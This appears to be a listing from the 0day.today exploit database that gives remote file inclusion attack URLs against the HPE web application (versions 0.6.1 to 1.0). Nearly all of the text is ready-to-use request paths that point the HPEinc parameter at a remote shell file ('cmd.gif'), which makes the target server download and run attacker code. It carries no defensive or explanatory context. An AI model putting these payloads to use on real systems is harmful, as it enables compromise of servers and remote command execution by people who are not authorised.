[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

HPE <= 1.0 (HPEinc) Remote File Include Vulnerabilities (updated)

Author
the master
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-734
Category
web applications
Date add
21-08-2006
Platform
unsorted
=================================================================
HPE <= 1.0 (HPEinc) Remote File Include Vulnerabilities (updated)
=================================================================



########################################################################
#  HPE v0.6.1  Remote File Inclusion Vulnerability
#
#  Found By: the master
#
########################################################################

1.0
#  http://[Target]/[Path]/HPE/lang/de.php?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/lang/fr.php?HPEinc=http://cmd.gif?
##############################################################################

0.7.0
#  http://[Target]/[Path]/HPE/clickerr.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/loadcatnews.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/motd.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/plugins/mod.news.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/plugins/mod.newslog.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/plugins/news.htmlnews.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/plugins/news.xmlbi.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/plugins/news.xmlphp.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/plugins/news.xmlphp.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/plugins/page.dmoz.show.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/thememaker.php3?HPEinc=http://cmd.gif?
##############################################################################

0.6.5
#  http://[Target]/[Path]/HPE/plugins/mod.news.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/plugins/news.htmlnews.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/plugins/news.xmlbi.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/plugins/news.xmlphp.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/plugins/page.dmoz.show.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/plugins/page.newnews.show.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/plugins/page.randnews.show.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/plugins/page.teaser.show.php3?HPEinc=http://cmd.gif?
###############################################################################

0.6.1
#  http://[Target]/[Path]/HPE/plugins/mod.news.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/plugins/news.htmlnews.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/plugins/news.xmlbi.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/plugins/news.xmlphp.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/plugins/page.dmoz.show.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/thememaker.php3?HPEinc=http://cmd.gif?
###############################################################################



#  0day.today [2024-12-24]  #